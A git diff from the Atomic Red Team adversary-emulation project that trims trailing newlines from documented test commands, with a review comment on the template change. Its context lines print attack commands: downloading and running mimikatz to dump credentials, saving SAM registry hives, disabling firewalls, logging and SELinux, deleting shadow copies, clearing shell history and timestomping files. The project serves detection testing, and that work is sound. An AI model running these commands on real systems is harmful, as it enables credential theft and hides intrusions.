diff --git a/atomic_red_team/atomic_doc_template.md.erb b/atomic_red_team/atomic_doc_template.md.erb
index 8a0b15d0..0f22faea 100644
--- a/atomic_red_team/atomic_doc_template.md.erb
+++ b/atomic_red_team/atomic_doc_template.md.erb
@@ -33,7 +33,7 @@
 <%- else -%>
 #### Run it with `<%= test['executor']['name'] %>`!
 ```
-<%= test['executor']['command'] %>
+<%= test['executor']['command'].to_s.strip %>
 ```
 <%- end -%>
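Review bot: `strip` on the new line trims leading whitespace as well as the trailing newline a YAML block scalar leaves on `command`, so a multi-line command whose first line is deliberately indented would be documented differently from the value that is actually run; `rstrip` (or `chomp`) confines the cleanup to the trailing newline this commit is removing, e.g. `<%= test['executor']['command'].to_s.rstrip %>`. If `command` is rendered or consumed anywhere besides this template, normalising it once where the YAML is loaded keeps the documentation and every other consumer in agreement instead of relying on each template to strip it. The enclosing `<%- if … -%>`/`<%- else -%>` branch begins before the hunk.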
diff --git a/atomics/t1002/t1002.md b/atomics/t1002/t1002.md
index a5b70dfe..3b058a54 100644
--- a/atomics/t1002/t1002.md
+++ b/atomics/t1002/t1002.md
@@ -36,7 +36,6 @@ TODO
 #### Run it with `powershell`!
 ```
 dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
-
 ```

@@ -50,6 +49,5 @@ TODO
 #### Run it with `powershell`!
 ```
 rar a -r #{output_file} #{input_file}
-
 ```
diff --git a/atomics/t1003/t1003.md b/atomics/t1003/t1003.md
index 7fbf5cc4..8fd2b6dd 100644
--- a/atomics/t1003/t1003.md
+++ b/atomics/t1003/t1003.md
@@ -164,7 +164,6 @@ Dumps Credentials via Powershell by invoking a remote mimikatz script
 #### Run it with `powershell`!
 ```
 IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
-
 ```

@@ -178,7 +177,6 @@ https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
 #### Run it with `command_prompt`!
 ```
 gsecdump -a
-
 ```

@@ -192,7 +190,6 @@ http://www.ampliasecurity.com/research/windows-credentials-editor/
 #### Run it with `command_prompt`!
 ```
 wce -o #{output_file}
-
 ```

@@ -209,6 +206,5 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
 reg save HKLM\sam sam
 reg save HKLM\system system
 reg save HKLM\security security
-
 ```
diff --git a/atomics/t1046/t1046.md b/atomics/t1046/t1046.md
index 1ac44994..70d568e0 100644
--- a/atomics/t1046/t1046.md
+++ b/atomics/t1046/t1046.md
@@ -31,6 +31,5 @@ for port in {1..65535}; do echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed" : ; done - ```
diff --git a/atomics/t1087/t1087.md b/atomics/t1087/t1087.md
index f78e0fc0..dee692d6 100644
--- a/atomics/t1087/t1087.md
+++ b/atomics/t1087/t1087.md
@@ -57,7 +57,6 @@ xxx
 #### Run it with `sh`!
 ```
 cat /etc/passwd > #{output_file}
-
 ```

@@ -76,7 +75,6 @@ xxx (requires root)
 #### Run it with `sh`!
 ```
 cat /etc/sudoers > #{output_file}
-
 ```

@@ -95,7 +93,6 @@ xxx
 #### Run it with `sh`!
 ```
 grep 'x:0:' /etc/passwd > #{output_file}
-
 ```

@@ -109,7 +106,6 @@ xxx
 #### Run it with `sh`!
 ```
 username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username
-
 ```

@@ -123,6 +119,5 @@ xxx
 #### Run it with `sh`!
 ```
 lastlog > #{output_file}
-
 ```
diff --git a/atomics/t1089/t1089.md b/atomics/t1089/t1089.md
index 548fccb1..4fc776a7 100644
--- a/atomics/t1089/t1089.md
+++ b/atomics/t1089/t1089.md
@@ -41,7 +41,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; systemctl stop firewalld systemctl disable firewalld fi - ```

@@ -62,7 +61,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; systemctl stop rsyslog systemctl disable rsyslog fi - ```

@@ -83,7 +81,6 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -eq "7" ]; systemctl stop cbdaemon systemctl disable cbdaemon fi - ```

@@ -97,6 +94,5 @@ Disables SELinux enforcement
 #### Run it with `sh`!
 ```
 setenforce 0
-
 ```
diff --git a/atomics/t1099/t1099.md b/atomics/t1099/t1099.md
index 46d0ed5c..d23c60ab 100644
--- a/atomics/t1099/t1099.md
+++ b/atomics/t1099/t1099.md
@@ -37,7 +37,6 @@ Stomps on the access timestamp of a file
 #### Run it with `sh`!
 ```
 touch -a -t 197001010000.00 #{target_filename}
-
 ```

@@ -56,7 +55,6 @@ Stomps on the modification timestamp of a file
 #### Run it with `sh`!
 ```
 touch -m -t 197001010000.00 #{target_filename}
-
 ```

@@ -82,6 +80,5 @@ date -s "1970-01-01 00:00:00"
 touch #{target_filename}
 date -s "$NOW"
 stat #{target_filename}
-
 ```
diff --git a/atomics/t1105/t1105.md b/atomics/t1105/t1105.md
index d25fd10b..3e2fb99b 100644
--- a/atomics/t1105/t1105.md
+++ b/atomics/t1105/t1105.md
@@ -64,6 +64,5 @@ sftp victim@victim-host:/tmp/victim-files/ <<< $'put /tmp/adversary-sftp'
 # Pull file from adversary using sftp
 sftp adversary@adversary-host:/tmp/adversary-sftp /tmp/victim-files/sftp-file
-
 ```
diff --git a/atomics/t1107/t1107.md b/atomics/t1107/t1107.md
index 07841464..36e51aa4 100644
--- a/atomics/t1107/t1107.md
+++ b/atomics/t1107/t1107.md
@@ -59,7 +59,6 @@ mkdir /tmp/victim-files
 cd /tmp/victim-files
 touch a b c d e f g
 echo "This file will be shredded" > /tmp/victim-shred.txt
-
 ```

@@ -73,7 +72,6 @@ Delete a single file from the temporary directory
 #### Run it with `sh`!
 ```
 rm -f /tmp/victim-files/a
-
 ```

@@ -87,7 +85,6 @@ Recursively delete the temporary directory and all files contained within it
 #### Run it with `sh`!
 ```
 rm -rf /tmp/victim-files
-
 ```

@@ -101,7 +98,6 @@ Use the `shred` command to overwrite the temporary file and then delete it
 #### Run it with `sh`!
 ```
 shred -u /tmp/victim-shred.txt
-
 ```

@@ -132,7 +128,6 @@ type nul > d
 type nul > e
 type nul > f
 type nul > g
-
 ```

@@ -146,7 +141,6 @@ Delete a single file from the temporary directory using cmd.exe
 #### Run it with `command_prompt`!
 ```
 del /f %TEMP%\victim-files-cmd\a
-
 ```

@@ -160,7 +154,6 @@ Recursively delete the temporary directory and all files contained within it usi
 #### Run it with `command_prompt`!
 ```
 del /f /S %TEMP%\victim-files-cmd
-
 ```

@@ -174,7 +167,6 @@ Delete a single file from the temporary directory using Powershell
 #### Run it with `powershell`!
 ```
 Remove-Item -path %TEMP%\victim-files-ps\a
-
 ```

@@ -188,7 +180,6 @@ Recursively delete the temporary directory and all files contained within it usi
 #### Run it with `powershell`!
 ```
 Remove-Item -path %TEMP%\victim-files-ps -recurse
-
 ```

@@ -202,7 +193,6 @@ Delete all volume shadow copies with vssadmin.exe
 #### Run it with `command_prompt`!
 ```
 vssadmin.exe Delete Shadows /All /Quiet
-
 ```

@@ -216,7 +206,6 @@ Delete all volume shadow copies with wmic
 #### Run it with `command_prompt`!
 ```
 wmic shadowcopy delete
-
 ```

@@ -231,7 +220,6 @@ xxx
 ```
 bcdedit /set {default} bootstatuspolicy ignoreallfailures
 bcdedit /set {default} recoveryenabled no
-
 ```

diff --git a/atomics/t1113/t1113.md b/atomics/t1113/t1113.md
index 22c05a5e..ace23e44 100644
--- a/atomics/t1113/t1113.md
+++ b/atomics/t1113/t1113.md
@@ -83,7 +83,6 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
 ```
 xwd -root -out #{output_file}
 xwud -in #{output_file}
-
 ```

diff --git a/atomics/t1115/t1115.md b/atomics/t1115/t1115.md
index 5ec42317..d77cef2d 100644
--- a/atomics/t1115/t1115.md
+++ b/atomics/t1115/t1115.md
@@ -35,7 +35,6 @@ Add data to clipboard to copy off or execute commands from.
 ```
 dir | clip
 clip < readme.txt
-
 ```

diff --git a/atomics/t1117/t1117.md b/atomics/t1117/t1117.md
index 5eca9f83..9413c3c8 100644
--- a/atomics/t1117/t1117.md
+++ b/atomics/t1117/t1117.md
@@ -47,7 +47,6 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 #### Run it with `command_prompt`!
 ```
 regsvr32.exe /s /u /i:#(unknown) scrobj.dll
-
 ```

@@ -66,7 +65,6 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 #### Run it with `command_prompt`!
 ```
 regsvr32.exe /s /u /i:#{url} scrobj.dll
-
 ```

@@ -85,6 +83,5 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 #### Run it with `command_prompt`!
 ```
 regsvr32.exe #{dll_name}
-
 ```
diff --git a/atomics/t1123/t1123.md b/atomics/t1123/t1123.md
index 90b08bac..2de8ec35 100644
--- a/atomics/t1123/t1123.md
+++ b/atomics/t1123/t1123.md
@@ -38,7 +38,6 @@ Create a file called test.wma, with the duration of 30 seconds
 #### Run it with `command_prompt`!
 ```
 SoundRecorder /FILE #{output_file} /DURATION #{duration_hms}
-
 ```

diff --git a/atomics/t1130/t1130.md b/atomics/t1130/t1130.md
index 13d3f89f..2f7798e1 100644
--- a/atomics/t1130/t1130.md
+++ b/atomics/t1130/t1130.md
@@ -57,6 +57,5 @@ else if [ $(rpm -q --queryformat '%{VERSION}' centos-release) -ge "7" ]; cp rootCA.crt /etc/pki/ca-trust/source/anchors/ update-ca-trust fi - ```
diff --git a/atomics/t1136/t1136.md b/atomics/t1136/t1136.md
index bb8941fd..57959349 100644
--- a/atomics/t1136/t1136.md
+++ b/atomics/t1136/t1136.md
@@ -36,7 +36,6 @@ Create a user via useradd
 #### Run it with `bash`!
 ```
 useradd -M -N -r -s /bin/bash -c "#{comment}" #{username}
-
 ```

@@ -55,6 +54,5 @@ dscl . -create /Users/#{username} RealName "#{realname}"
 dscl . -create /Users/#{username} UniqueID "1010"
 dscl . -create /Users/#{username} PrimaryGroupID 80
 dscl . -create /Users/#{username} NFSHomeDirectory /Users/#{username}
-
 ```
diff --git a/atomics/t1139/t1139.md b/atomics/t1139/t1139.md
index a489642f..4bc58acc 100644
--- a/atomics/t1139/t1139.md
+++ b/atomics/t1139/t1139.md
@@ -33,6 +33,5 @@ xxxx
 #### Run it with `sh`!
 ```
 cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
-
 ```
diff --git a/atomics/t1146/t1146.md b/atomics/t1146/t1146.md
index 75dd9602..0cd9cb4a 100644
--- a/atomics/t1146/t1146.md
+++ b/atomics/t1146/t1146.md
@@ -38,7 +38,6 @@ Clears bash history via rm
 #### Run it with `sh`!
 ```
 rm ~/.bash_history
-
 ```

@@ -52,7 +51,6 @@ Clears bash history via rm
 #### Run it with `sh`!
 ```
 echo "" > ~/.bash_history
-
 ```

@@ -66,7 +64,6 @@ Clears bash history via cat /dev/null
 #### Run it with `sh`!
 ```
 cat /dev/null > ~/.bash_history
-
 ```

@@ -80,7 +77,6 @@ Clears bash history via a symlink to /dev/null
 #### Run it with `sh`!
 ```
 ln -sf /dev/null ~/.bash_history
-
 ```

@@ -94,7 +90,6 @@ Clears bash history via truncate
 #### Run it with `sh`!
 ```
 truncate -s0 ~/.bash_history
-
 ```

@@ -110,6 +105,5 @@ Clears the history of a bunch of different shell types by setting the history si
 unset HISTFILE
 export HISTFILESIZE=0
 history -c
-
 ```
diff --git a/atomics/t1148/t1148.md b/atomics/t1148/t1148.md
index 3a86b118..ff901f7a 100644
--- a/atomics/t1148/t1148.md
+++ b/atomics/t1148/t1148.md
@@ -34,6 +34,5 @@ Disables history collection in shells
 ```
 export HISTCONTROL=ignoreboth
 ls #{evil_command}
-
 ```